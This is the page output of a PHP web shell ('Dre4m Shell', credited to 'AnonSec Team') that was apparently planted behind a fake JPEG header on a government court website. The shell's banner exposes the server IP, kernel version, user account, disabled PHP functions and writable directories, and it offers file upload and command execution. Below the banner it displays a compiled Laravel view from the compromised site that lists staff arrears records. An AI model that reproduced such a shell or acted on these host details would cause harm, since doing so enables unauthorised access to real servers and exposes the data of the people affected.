ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.142.252.205
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/9ff14fb71a1874cfda3f7d6e4c0951146c43465b.php

<style type="text/css">
    table,
    table tr th,
    table tr {
        border: 1px solid #EEE;
    }
</style>

<?php $__env->startSection('content'); ?>
    <form method="post" action="" id="mainform" name="mainform">

        <div class="box-body" style="background:#FFF;">
            <div class="row" style="background:#FFF;">
                <div class="col-md-12">
                    <?php if(count($errors) > 0): ?>
                        <div class="alert alert-danger alert-dismissible" role="alert">
                            <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span
                                    aria-hidden="true">&times;</span>
                            </button>
                            <strong>Error!</strong>
                            <?php $__currentLoopData = $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                <p><?php echo e($error); ?></p>
                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        </div>
                    <?php endif; ?>

                    <?php if(session('msg')): ?>
                        <div class="alert alert-success alert-dismissible" role="alert">
                            <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span
                                    aria-hidden="true">&times;</span>
                            </button>
                            <strong>Success!</strong>
                            <?php echo e(session('msg')); ?>

                        </div>
                    <?php endif; ?>
                    <?php if(session('err')): ?>
                        <div class="alert alert-danger alert-dismissible" role="alert">
                            <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span
                                    aria-hidden="true">&times;</span>
                            </button>
                            <strong>Warning!</strong>
                            <?php echo e(session('err')); ?>

                        </div>
                    <?php endif; ?>

                </div>
                <?php echo e(csrf_field()); ?>


                <div class="col-md-12">


                </div>
            </div><!-- /.col -->
        </div><!-- /.row -->


        <div class="box-body" style="background:#FFF;">

            <div class="box-body">
                <div class="row hidden-print">
                    <h3 class="text-center">Staff Due For Variation</h3>
                    <?php if($CourtInfo->courtstatus == 1): ?>
                        <div class="col-md-6">
                            <div class="form-group">
                                <label for="staffName">Court</label>
                                <select name="court" id="court" class="form-control court">
                                    <option value="">Select court</option>
                                    <?php $__currentLoopData = $court; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $courts): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                        <?php if($courts->id == session('searchCourt')): ?>
                                            <option value="<?php echo e($courts->id); ?>" selected="selected">
                                                <?php echo e($courts->court_name); ?></option>
                                        <?php else: ?>
                                            <option value="<?php echo e($courts->id); ?>"><?php echo e($courts->court_name); ?></option>
                                        <?php endif; ?>
                                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                                </select>
                            </div>
                        </div>
                    <?php else: ?>
                        <input type="hidden" id="court" name="court" value="<?php echo e($CourtInfo->courtid); ?>">
                    <?php endif; ?>

                    <?php if($CourtInfo->divisionstatus == 1 && Auth::user()->is_global == 1): ?>
                        <div class="col-md-6">
                            <div class="form-group">
                                <label for="staffName">Division</label>

                                
                                <select name="division" id="" class="form-control">
                                    <option value="">Select</option>

                                    
                                    <?php $__currentLoopData = $courtDivisions; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $div): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                        
                                        
                                        <option value="<?php echo e($div->divisionID); ?> <?php if(old('division') == $div->divisionID): ?>  <?php endif; ?>">
                                            <?php echo e($div->division); ?>

                                        </option>
                                        
                                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>

                                    

                                </select>
                            </div>
                        </div>
                    <?php else: ?>
                        <div class="col-md-6">
                            <div class="form-group">
                                <label>Division</label>
                                <input type="text" class="form-control" id="divisionName" name="divisionName"
                                    value="<?php echo e($curDivision->division); ?>" readonly>
                            </div>
                        </div>
                        <input type="hidden" id="division" name="division" value="<?php echo e(Auth::user()->divisionID); ?>">
                        
                    <?php endif; ?>
                    <div class="col-md-3">
                        <div class="form-group">
                            <label for="vehicle">Due Date</label>
                            <input type="Text" name="dueDate" id="dueDate" class="form-control"
                                value="<?php echo e($dueDate); ?>" />
                        </div>
                    </div>
                    <div class="col-md-3">
                        <div class="form-group">
                            <label for="staffName">Process Year</label>

                            <select name="year" class="form-control">
                                <option value="">Pending</option>
                                <option value="All">All</option>
                                <?php for($i = 2010; $i <= 2030; $i++): ?>
                                    <option value="<?php echo e($i); ?>" <?php if($year == $i): ?> selected <?php endif; ?>>
                                        <?php echo e($i); ?></option>
                                <?php endfor; ?>
                            </select>

                        </div>
                    </div>
                    <div class="col-md-3">
                        <div class="form-group">
                            <label for="staffName">Process Month</label>
                            <select name="month" id="section" class="form-control">
                                <option value="">Pending </option>
                                <option value="All">All </option>
                                <option value="JANUARY" <?php echo e($month == 'JANUARY' ? 'selected' : ''); ?>>January</option>
                                <option value="FEBRUARY" <?php echo e($month == 'FEBRUARY' ? 'selected' : ''); ?>>February</option>
                                <option value="MARCH" <?php echo e($month == 'MARCH' ? 'selected' : ''); ?>>March</option>
                                <option value="APRIL" <?php echo e($month == 'APRIL' ? 'selected' : ''); ?>>April</option>
                                <option value="MAY" <?php echo e($month == 'MAY' ? 'selected' : ''); ?>>May</option>
                                <option value="JUNE" <?php echo e($month == 'JUNE' ? 'selected' : ''); ?>>June</option>
                                <option value="JULY" <?php echo e($month == 'JULY' ? 'selected' : ''); ?>>July</option>
                                <option value="AUGUST" <?php echo e($month == 'AUGUST' ? 'selected' : ''); ?>>August</option>
                                <option value="SEPTEMBER" <?php echo e($month == 'SEPTEMBER' ? 'selected' : ''); ?>>September</option>
                                <option value="OCTOBER" <?php echo e($month == 'OCTOBER' ? 'selected' : ''); ?>>October</option>
                                <option value="NOVEMBER" <?php echo e($month == 'NOVEMBER' ? 'selected' : ''); ?>>November</option>
                                <option value="DECEMBER" <?php echo e($month == 'DECEMBER' ? 'selected' : ''); ?>>December</option>

                            </select>
                        </div>
                    </div>
                    <div class="col-md-3">
                        <div class="form-group">
                            <button type="submit" class="btn btn-success pull-right">Reload</button>
                        </div>
                    </div>


                </div>


                <hr>
                <div align="center"><strong></strong></div>
                <br />
                <table class="table table-hover table-striped table-responsive table-condensed">

                    <thead>
                        <tr>
                            <th>SN</th>
                            <th>File Number</th>
                            <th>Staff Name</th>

                            <th>Arrears Type</th>
                            <th>Old Grade</th>
                            <th>New Grade</th>
                            <th>Old Step</th>
                            <th>New Step</th>

                            <th>Arrears Due Date</th>
                            <th>Period Processed</th>
                            <th>Document</th>
                            <th>Action</th>
                        </tr>
                    </thead>
                    <?php $sn = 0; ?>
                    <tbody>
                        <?php $__currentLoopData = $due; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $d): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <?php $sn += 1; ?>
                            <tr>

                                <td><?php echo e($sn); ?></td>
                                <td><?php echo e($d->Fnumber); ?></td>
                                <td><?php echo e($d->Names); ?></td>
                                <td><?php echo e($d->arrears_type); ?></td>
                                <td>
                                    <?php if($d->old_grade == 0): ?>
                                        NA
                                    <?php else: ?>
                                        <?php echo e($d->old_grade); ?>

                                    <?php endif; ?>
                                </td>
                                <td><?php echo e($d->new_grade); ?></td>
                                <td>
                                    <?php if($d->old_step == 0): ?>
                                        NA
                                    <?php else: ?>
                                        <?php echo e($d->old_step); ?>

                                    <?php endif; ?>
                                </td>
                                <td><?php echo e($d->new_step); ?></td>
                                <td><?php echo e($d->due_date); ?></td>
                                <td><?php echo e($d->year_payment); ?> <?php echo e($d->month_payment); ?></td>
                                <td>
                                    <?php if($d->doc_url): ?>
                                        <a class="btn btn-info" href="<?php echo e(asset($d->doc_url)); ?>"
                                            target="_blank">View</a>
                                    <?php endif; ?>
                                </td>
                                <th>
                                    <div align="right">
                                        <a onclick="return ConfirmDelete('<?php echo e($d->ID); ?>')" title="Remove"
                                            class="btn btn-danger deleteBankList"> <i class="fa fa-trash"></i> </a>
                                    </div>

                                </th>

                            </tr>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </tbody>

                </table>

            </div>
        </div>
        <input type="hidden" id="delid" name="delid">
    </form>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('styles'); ?>
    <link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/datepicker.min.css')); ?>">
<?php $__env->stopSection(); ?>
<?php $__env->startSection('scripts'); ?>
    <script src="<?php echo e(asset('assets/js/jquery-ui.min.js')); ?>"></script>

    <script type="text/javascript">
        function ConfirmDelete(id) {

            var cmt = confirm('You are about to delete a record. Click OK to continue?');
            if (cmt == true) {
                document.getElementById('delid').value = id;
                document.getElementById('mainform').submit();
                return;
            }
        }

        $(document).ready(function() {

            $("#court").on('change', function(e) {
                e.preventDefault();
                var id = $(this).val();
                var d = 'search_court';
                //alert(id);
                $token = $("input[name='_token']").val();
                $.ajax({
                    headers: {
                        'X-CSRF-TOKEN': $token
                    },
                    url: murl + '/division/session',

                    type: "post",
                    data: {
                        'courtID': id,
                        'val': d
                    },
                    success: function(data) {
                        location.reload(true);
                        //console.log(data);
                    }
                });

            });
        });

        $(document).ready(function() {
            $('#division').change(function() {
                //alert('ok')
                var d = 'search_division';
                $.ajax({
                    url: murl + '/division/session',
                    type: "post",
                    data: {
                        'division': $('#division').val(),
                        'val': d,
                        '_token': $('input[name=_token]').val()
                    },
                    success: function(data) {
                        console.log(data);
                        location.reload(true);
                    }
                });
            });
        });

        $(function() {
            $("#overdueDate").datepicker({
                changeMonth: true,
                changeYear: true,
                dateFormat: 'yy-mm-dd'
            });
            $("#dueDate").datepicker({
                changeMonth: true,
                changeYear: true,
                dateFormat: 'yy-mm-dd'
            });
            $("#incrementalDate").datepicker({
                changeMonth: true,
                changeYear: true,
                dateFormat: 'yy-mm-dd'
            });
        });
    </script>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/dueForArrears/list.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team